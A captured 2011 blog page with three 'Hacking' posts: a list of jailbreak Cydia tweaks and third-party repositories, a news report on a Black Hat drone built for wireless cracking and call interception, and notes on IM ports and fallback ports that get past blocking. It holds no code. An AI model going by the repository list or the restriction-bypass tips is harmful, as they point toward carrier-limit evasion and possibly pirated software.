  • MobileVolumeSound – Adds the traditional Mac volume sound when raising/lowering the iPhone’s volume.
  • OpenSSH – Allows you to connect to your iPhone, via SSH, over WiFi, in order to transfer files to/from it.
  • Remove Recents – Removes icons of apps from the Multitasking Drawer (what you seen when you double-tap Home button) if the app doesn’t support multitasking.
  • SBSettings – Allows you to access common settings (e.g. Enable 3G, WiFi, etc) and functions (e.g. Take screenshot) via customized screen swipes, taps, double-taps, etc.
  • Serious SBSettings HD – Optimized Retina theme for SBSettings
  • UserAgent Faker - Similar to Safari Developer Tools for Mac that allow you to emulate another browser such as FireFox.
  • 3G Unrestrictor – Allows you to configure traditionally WiFi-only apps like FaceTime to function on 3G. Also allows for bypassing of 10Mb size limits in App Store downloads.
  • FullScreen Safari – Allows for toggling of Safari browser into full screen mode and includes support for multi-touch gestures.
  • Apple.com HD SBSettings – Customized theme for SBSettings that makes it resemble the clean Apple.com website.
  • Open Notifier - Adds notification icons to the iPhone’s status bar.
  • Shrink – Allows you to decrease the size of your iPhone icons to achieve a cleaner and less cluttered look.
  • SB 2 Cloud – Lets users configure screenshots to be uploaded in the background to Cloud app immediately upon taking them and automatically copies the shortened URL to the clipboard for easy sharing.
  • Voice Activator - Enhances the iPhones voice activated command functionality by allowing the use of voice commands to open apps, navigate to websites, toggle options like WiFi, Bluetooth, and Airplane mode, reboot the device and take screenshots.
  • BytaFont – Allows for the customization of display fonts on the iPhone, versus using the default, built-in font.
  • TV Tube Sleep – Customizes the behavior of the iPhone when the Sleep button is pressed by displaying an animation that resembles the turning off of 20th Century, tube television sets.
  • My3G – Provides the same functionality provided by 3G Unrestrictor, as described above in the list.
  • MyWi 4.0 – Allows iPhone users to share their devices 3G connection via WiFi or USB/Bluetooth tethering and supports unencrypted and encrypted sharing. (Note: To be used cautiously if not on an unlimited data plan)
  • AdBlocker – Blocks ads from appearing in Safari, as well as within apps that include advertisements.

In order to find some of these apps within Cydia, users may need to add some or all of the following repositories, within Cydia. The lifespan of repositories is often unpredictable, so some that may be available now may not be in the near future. Since they must be added manually and only work within Cydia, they are purposely not hyperlinked:

  • http://repo.benm.at/
  • http://cydia.myrepospace.com/atomicmufin
  • http://cydia.bitesms.com/cydia/beta5.1
  • http://cydia.hackulo.us
  • http://cydia.myrepospace.com/iHaxer
  • http://repo.insanelyi.com
  • http://sinfuliphonerepo.com
  • http://www.themeitapp.com
  • http://kuaidial.googlecode.com/svn/deb

As usual, it’s “Buyer Beware” with any app installed via Cydia. By installing it, the user is assuming that the package will do what its description says and won’t create problems with their device. Unfortunately, some apps may cause conflicts and not function as expected. If a user installs one and finds this to be the case, they should remove the package by navigating to “Manage” >”Packages”>(Tap the app to be uninstalled)>”Modify”>”Remove”. The same procedure applies to an app which may cause the device to crash once activated.

Users are encouraged to research the app prior to paying for and/or installing it on their iPhone. More information can be found on each one at http://cydia.saurik.com/.


Editor’s Note: A big thanks goes out to @aelphae, @iWG83 and their collaborative-minded friends for taking the time to compile this list of the best Cydia apps. It’s people like them that make things easier for new iPhone users to get the most out of their devices.

Disclaimer: Neither Geek Shui Living nor its contributors endorse or encourage the practice of jailbreaking. As always, iPhone and iPod Touch owners are reminded that jailbreaking their devices is legal but does effectively void the manufacturer’s warranty, could render their device temporarily useless if something goes wrong and should not be attempted by anyone. Yes, that means you, too.

'Hacking' 카테고리의 다른 글

Malware URL  (0) 2011.08.18
Social Networking Security Threats  (0) 2011.08.12
Wardriving Evolves Into Warflying  (0) 2011.08.05
IM Server  (1) 2011.08.03
SYN Cookie  (0) 2011.08.03
Posted by CEOinIRVINE
l
Wardriving Evolves Into WarflyingResearchers release specs for a DIY radio-controlled plane that hacks systems by air

Aug 04, 2011 | 01:48 PM | 0 Comments

By Ericka Chickowski, Contributing Editor
Dark Reading


BLACK HAT USA 2011 -- Las Vegas -- Yesterday at Black Hat, two security researchers demonstrated how a radio-controlled model airplane outfitted with a computer and 4G connectivity could be used to create a nearly undetectable aerial hacking device that could perpetrate aerial attacks on targets otherwise unreachable by land.

Created completely with off-the-shelf equipment and open-source software -- and with a budget of only about $6,100 -- the demo plane they brought on stage with them was capable of wireless network sniffing and cracking, cell tower spoofing, cell phone tracking and call interception, data exfiltration, and video surveillance.

Click here for more of Dark Reading's Black Hat articles.

"There is some really evil stuff you can do from the sky," said Mike Tassey, who together with Richard Perkins spent more than 1,300 hours building, testing, and refining the device they call the Wireless Aerial Surveillance Platform (WASP).

Built on top of a surplus Army target drone Perkins had sitting in his basement, the device has been equipped with multiple wireless antennae and a microcomputer loaded with GPS, wireless sniffing tools, and the Backtrack 5 penetration testing toolkit. The 14-pound, 6-foot-long plane connects through a 4G dongle with a small base station that controls it using Google Earth and an open-source autopilot software solution. The base station streams data gathered by the plane and sends it over a VPN connection to a more robust back-end PC, which can take care of the heavy-lifting, such as crunching through large dictionaries to perform brute-force attacks. The Internet connectivity would make it possible to also crowdsource data to multiple hackers with different skill sets if a project needed the manpower.

The plane itself is powered off of an electric engine that is hard to detect by ear once it is as close as 50 feet away. Though FAA regulations prohibit flight of such devices from going above 400 feet, the drone itself would be capable of going well above 20,000 feet in altitude.

Perkins and Tassey said a device such as the one they developed could potentially be used for a number of nefarious reasons beyond run-of-the-mill hacking, including drug trafficking and terrorism. On the plus side, such drones could also be used by forces of good, including for search and rescue, military and law enforcement operations, and even to provide emergency cellular service in disaster zones. Whether built for good or bad, the design is not complicated, they said.

"You don't need a Ph.D. from MIT to do this," Perkins said.

Unfortunately, both presenters said they couldn't yet think of a good way to protect against a WASP-like attack. Not even missiles would work against these drones because they don't put out the kind of heat or radar signatures necessary for missiles to track and destroy them.

"So how do you defend against this? I don't know. That's what you guys are for. We need the right people to start thinking about this. How would you defend against something like this?" Perkins said. "Because if we thought of it, someone else has, too. They're just not telling you about it."

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.

'Hacking' 카테고리의 다른 글

Social Networking Security Threats  (0) 2011.08.12
Jailbreak Apps  (2) 2011.08.09
IM Server  (1) 2011.08.03
SYN Cookie  (0) 2011.08.03
A successful DoS attack overwhelms its victim with such a massive barrage of false  (0) 2011.07.28
Posted by CEOinIRVINE
l

IM Server

Hacking 2011. 8. 3. 08:23

IM Server
The IM server maintains the directory of user accounts, keeps track of who is
online, and, in most cases, routes messages among users. The IM server operates in
real time, sending messages back and forth between two users as they finish typing
each line of text. The servers also pass real-time information about the availability
of various users in the directory, such as when they come online and change their
status message.
Each IM server communicates with its clients over an assigned port number across
the Internet. But IM clients however, can login using other ports when the default
port is blocked by a deny policy. Typical port numbers include those shown in the
following table:
IM Application Service Port Numbers Proxies
AIM 5190 SOCKS 4, SOCKS 5,
HTTP, HTTPS
ICQ 5190
YMSG 50501 (443 and 80)
1.In addition to port 5050, make sure traffic is permitted on
ports 443 (HTTPS) and 80 (HTTP).
SOCKS 4, SOCKS 5,
HTTP
MSN Messenger 1863 SOCKS 4, SOCKS 5,
HTTP

'Hacking' 카테고리의 다른 글

Jailbreak Apps  (2) 2011.08.09
Wardriving Evolves Into Warflying  (0) 2011.08.05
SYN Cookie  (0) 2011.08.03
A successful DoS attack overwhelms its victim with such a massive barrage of false  (0) 2011.07.28
Firewall DoS Attacks  (0) 2011.07.28
Posted by CEOinIRVINE
l